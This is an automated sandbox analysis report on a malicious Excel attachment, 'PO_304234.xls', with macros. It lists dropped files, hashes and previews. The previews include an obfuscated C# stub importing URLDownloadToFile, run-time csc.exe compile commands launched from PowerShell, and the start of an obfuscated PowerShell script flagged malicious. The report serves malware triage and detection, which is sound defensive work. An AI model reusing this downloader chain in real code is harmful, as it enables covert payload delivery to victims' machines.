                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....y.....y...........................#.............. >.....P ......P.........V.....Y.....^.....g.....s...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.im
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):866
                                                      Entropy (8bit):5.33029523093305
                                                      Encrypted:false
                                                      SSDEEP:24:AId3ka6Kzl3nrO0Eol3nrO7KaMD5DqBVKVrdFAMBJTH:Akka601nq0Eo1nq7KdDcVKdBJj
                                                      MD5:2947832763BF005B128C90D388329669
                                                      SHA1:F7D30E812F1CE5B0D5D8A3C0FCD1E97351ABA2B0
                                                      SHA-256:DAF5C1C431CFE3A973E8CAE140F448887494B70CE36AB2904BB741A21CF9AF26
                                                      SHA-512:649689B934F1ABC32B0FE7564CD017596B8894CDF2BF24D74563017000D7C177CF774BECEC750E8B9CA27284AA483F0BF086700CBF8DBA20C0A1E2026AABE918
                                                      Malicious:false
                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:MSVC .res
                                                      Category:dropped
                                                      Size (bytes):652
                                                      Entropy (8bit):3.086541143388619
                                                      Encrypted:false
                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykak7YnqqqPN5Dlq5J:+RI+ycuZhNCakSqPNnqX
                                                      MD5:AEDE579309AA9D8F1A51E23FE6FBA2BB
                                                      SHA1:A0B872E24BCA228C72BA1C2A09C2258F3F50770E
                                                      SHA-256:190AFF53A667DC96445FF5332547F71996C834F93A627DF8F8CED118AA219E22
                                                      SHA-512:8D4E3749B83AB7B6962F2A87ADA7DDAB14A44229A12A5609093FD112B0B2342B78C91CBE19783482AF37920AA045936C43E6B07BB2C6111010678F5D548717D1
                                                      Malicious:false
                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.j.o.4.t.j.0.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                      Category:dropped
                                                      Size (bytes):469
                                                      Entropy (8bit):3.9168776922580797
                                                      Encrypted:false
                                                      SSDEEP:6:V/DsYLDS81zun8cqZNVMm7tQXReKJ8SRHy4HmvmKlW0Dbme2Oi1mYy:V/DTLDfuGZeXfHav3DuOvYy
                                                      MD5:F347D2095BBABC6430C3479994132BB6
                                                      SHA1:DA6356149A945F87B97115EB29A0A6B665A4862C
                                                      SHA-256:053B79EC2FB6EB79BFC39B418EF150F58F21132501130910976F79C4B99AD5BC
                                                      SHA-512:57DA6A9EF5099DA3A8041BA16B3161A3669FC49F1B95C89C2096B946F926A7516CF1041D2481B7E36D7F874AE02F72F13F4BA2573710B96C184CD2D4629D6630
                                                      Malicious:false
                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace MAg.{. public class vQwQONIjUcm. {. [DllImport("UrLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr vE,string tbBn,string zCrVCZth,uint jKFGSfwvaiR,IntPtr MnTOq);.. }..}.
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):369
                                                      Entropy (8bit):5.222130447266008
                                                      Encrypted:false
                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f6KWzxs7+AEszIP23f6KAAn:p37Lvkmb6KzSKWWZEoSKAA
                                                      MD5:C9837710331152B46531F33BAE37FA1F
                                                      SHA1:AF6FA70216F8A5CC47D2E32A781EB9646978CA68
                                                      SHA-256:D01CF0A290E47E3E1DD3559637075FCDCDC0B9F6973B039FC16B3796B6833CD2
                                                      SHA-512:2E02154E67C4F9E6071E25F57B2E0C4410DCB19E43D7C289F9ED178E754FCCA2CACDAB657982C2899FF42062A8D002B2F36D3AF7F90D586B4C9074AEC332EBCA
                                                      Malicious:false
                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs"
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):2.8403742403951004
                                                      Encrypted:false
                                                      SSDEEP:24:etGSpPBG5eAdF8m3Bkr1+/ntkZfI2MEWI+ycuZhNCakSqPNnq:6CsAdeme8/WJI2Mn1ulCa3Gq
                                                      MD5:E5895AC5E4C5DE379173C19CC2E7A128
                                                      SHA1:4EC1675A6B337E7C8C6D13072D6C05588861A34B
                                                      SHA-256:FB050319AE0415C5FD14E531B10AADEEA6A8A4D9526C23754199F29BE0CE51C6
                                                      SHA-512:F38653C4E14B3D0B9C8655269E37D998F4B0D0784835275EE082E77318EE64913DF7857BB3EAA480D4CF34E0D903357F4F441F70C1D7E61ECBBA9CD87D99A31E
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....y.....y...........................#.............. >.....P ......P.........V.....Y.....^.....g.....s...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.mj
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                      Category:modified
                                                      Size (bytes):866
                                                      Entropy (8bit):5.341783564726212
                                                      Encrypted:false
                                                      SSDEEP:24:AId3ka6KzSGEoSj1KaMD5DqBVKVrdFAMBJTH:Akka60dEoMKdDcVKdBJj
                                                      MD5:47DF36512066F32452BE222776E3183E
                                                      SHA1:7535179A29FDC858D16A54DB075E62D14B17ED86
                                                      SHA-256:C4FEC020EAA479DF535FB36A4E0C22F846FD178713EAE5B1CB177A93D8C5C93F
                                                      SHA-512:80F5D5BAFA58D7620647C984549174BBADBECB3573AEAAE8409D82ACEF6AE38102478A0F2DB0DC064AB5301B0949D242616DCD336297A276D586C7F6B65B19C8
                                                      Malicious:false
                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):182074
                                                      Entropy (8bit):3.839212582497392
                                                      Encrypted:false
                                                      SSDEEP:3072:hGhbpF6rvZuVP8rpnVoipBqWxpgt5pfGwLU40y7ND3/Mua+LhrNkY:whKrvcVUrJVocBFSUAD30j+L9+Y
                                                      MD5:825926FCCB7DEBB08441E8DCD4963411
                                                      SHA1:D6299F30A8C04F8AAC1650F118443756E4EFFD4A
                                                      SHA-256:28185883247F149D31E10069DE858A3B3C7026E57D4C0D7DCAE1D87204D4573D
                                                      SHA-512:0BBFA440423715751AC5DFCAD1094058C469496C603B3358CD07BC725BCBF340BEB69D5B4676C0BE100E3E1BB231952D85989413A283C3B03613C09B96F1DBFF
                                                      Malicious:true
                                                      Preview:......P.C.A.z.b.L.L.P.z.i. .=. .".j.e.i.G.W.R.W.o.K.c.".....t.c.H.c.Z.k.t.B.W.R. .=. .".K.W.e.x.z.A.G.c.L.r.".....W.W.W.T.S.i.S.P.q.i. .=. .".p.s.n.i.Z.c.a.K.i.A.".....e.B.m.j.Z.B.r.H.k.W. .=. .".B.c.o.k.Z.t.B.W.R.t.".....b.p.A.L.Z.B.G.C.c.p. .=. .".o.W.W.Z.k.G.d.K.p.T.".....L.Z.A.L.u.i.H.x.p.G. .=. .".W.C.h.p.L.W.K.a.W.G.".....L.p.S.I.z.k.O.d.L.t. .=. .".W.Z.K.A.U.i.d.U.K.b.".........A.N.c.H.i.U.G.n.P.p. .=. .".d.U.e.Q.e.c.P.b.L.N.".....Q.N.K.G.h.C.O.t.K.H. .=. .".t.n.e.A.L.Q.f.K.G.u.".....s.L.i.r.z.L.b.Z.m.h. .=. .".L.H.f.N.f.p.c.q.i.n.".....K.Z.u.K.m.c.L.m.j.W. .=. .".i.f.P.Z.u.l.u.W.R.k.".....z.q.m.A.K.G.t.m.h.m. .=. .".z.n.z.d.W.k.l.L.L.d.".....L.B.m.O.x.f.f.B.c.L. .=. .".C.i.x.S.f.v.W.k.b.s.".....G.t.U.n.o.L.O.h.c.i. .=. .".n.S.J.W.Z.f.v.d.x.T.".....G.L.t.L.W.R.J.K.A.K. .=. .".i.W.P.A.I.t.b.c.W.u.".....k.N.U.U.G.N.p.b.o.Q. .=. .".m.L.k.U.L.N.N.A.L.b.".....c.L.i.b.Q.G.Z.L.Q.K. .=. .".O.c.R.c.z.B.P.C.T.n.".........h.W.H.s.d.H.g.p.t.e. .=. .".u.U.e.i.R.R.R.W.u.d.".....O.u.f.c.L.H.o.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):559616
                                                      Entropy (8bit):7.981720439023974
                                                      Encrypted:false
                                                      SSDEEP:12288:N+/nZ4GG3Ua/HWgDdfSeh3x/2V9JfKBFhBzwi5KSNp7JSJvOjD:NCSGYUuWWBh3x/2fJf4fJKSfEtS
                                                      MD5:46FF12BF43C6EC84745A3BEA9B2B0E1D
                                                      SHA1:43299B8EFCE1B176321DB218A475AB0B812D2123
                                                      SHA-256:68D8B84AE96164B511DC09162A5DB8E2873E33AD9968086B17FD8D452A2ED954
                                                      SHA-512:7FEF61C25D289424CCEA60815338456020ACC901968EBC61201EDBCA45FC7ABDFF18FEBFF459A132133F184E7B00534373AD48645030B153436D9CCB43636F36
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:56:44 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):559616
                                                      Entropy (8bit):7.981720439023974
                                                      Encrypted:false
                                                      SSDEEP:12288:N+/nZ4GG3Ua/HWgDdfSeh3x/2V9JfKBFhBzwi5KSNp7JSJvOjD:NCSGYUuWWBh3x/2fJf4fJKSfEtS
                                                      MD5:46FF12BF43C6EC84745A3BEA9B2B0E1D
                                                      SHA1:43299B8EFCE1B176321DB218A475AB0B812D2123
                                                      SHA-256:68D8B84AE96164B511DC09162A5DB8E2873E33AD9968086B17FD8D452A2ED954
                                                      SHA-512:7FEF61C25D289424CCEA60815338456020ACC901968EBC61201EDBCA45FC7ABDFF18FEBFF459A132133F184E7B00534373AD48645030B153436D9CCB43636F36
                                                      Malicious:true
                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 02:26:14 2024, Security: 1
                                                      Entropy (8bit):7.95888682247645
                                                      TrID:
                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                      File name:PO_304234.xls
                                                      File size:569'344 bytes
                                                      MD5:ac30e3d8b0557592e89bdca3e6b4e879
                                                      SHA1:d484bca1c79af754eced69d18348c2a5e8cbe325
                                                      SHA256:adf8f2babc9a03e459102fd4290645fd46ae83f3001e581a7735f592449fd421
                                                      SHA512:35c7bbace367dca74bf6f80352237e8ab426efc643735e4f5cd0cefd917efb73af3915b621b8ee9e6190ffb5559562e0d7edd88468a861c5ea1ff8de976118ba
                                                      SSDEEP:12288:g+XRb0e93WNXplTiFFhzxgq5lBfh9HK3R2XetknutN2TeqQ:gIRQxFqFrgq5PfnHhet9N2+
                                                      TLSH:4DC422093AD8CF53D60727BA0DE8E9970601FE249F66868BB584772E0F7D752F853602
                                                      Icon Hash:276ea3a6a6b7bfbf
                                                      Document Type:OLE
                                                      Number of OLE Files:1
                                                      Has Summary Info:
                                                      Application Name:Microsoft Excel
                                                      Encrypted Document:True
                                                      Contains Word Document Stream:False
                                                      Contains Workbook/Book Stream:True
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:True
                                                      Code Page:1252
                                                      Author:
                                                      Last Saved By:
                                                      Create Time:2006-09-16 00:00:00
                                                      Last Saved Time:2024-08-28 01:26:14
                                                      Creating Application:Microsoft Excel
                                                      Security:1
                                                      Document Code Page:1252
                                                      Thumbnail Scaling Desired:False
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:786432
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                      VBA File Name:Sheet1.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet1"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                      VBA File Name:Sheet2.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet2"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                      VBA File Name:Sheet3.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet3"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                      VBA File Name:ThisWorkbook.cls
                                                      Stream Size:985
                                                      Attribute VB_Name = "ThisWorkbook"
                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:114
                                                      Entropy:4.25248375192737
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:244
                                                      Entropy:2.889430592781307
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                      General
                                                      Stream Path:\x5SummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:200
                                                      Entropy:3.2403503175049813
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . E . . . . . . . . .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                      General
                                                      Stream Path:MBD0032CD05/\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:99
                                                      Entropy:3.631242196770981
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      General
                                                      Stream Path:MBD0032CD05/Package
                                                      CLSID:
                                                      File Type:Microsoft Excel 2007+
                                                      Stream Size:19363
                                                      Entropy:7.65458028132816
                                                      Base64 Encoded:True
                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
